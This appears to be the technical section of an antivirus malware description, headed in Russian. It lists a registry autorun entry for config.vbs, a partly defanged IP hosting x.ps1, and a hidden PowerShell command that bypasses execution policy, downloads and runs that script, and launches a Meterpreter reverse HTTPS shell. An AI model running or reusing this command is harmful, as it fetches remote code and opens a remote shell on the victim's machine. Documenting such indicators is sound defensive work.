Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = 'C:\Users\testing\AppData\Roaming\config.vbs'
- http://18#.#66.2.128/x.ps1
- '18#.#66.2.128':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://18#.#66.2.128/x.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost ...' (со скрытым окном)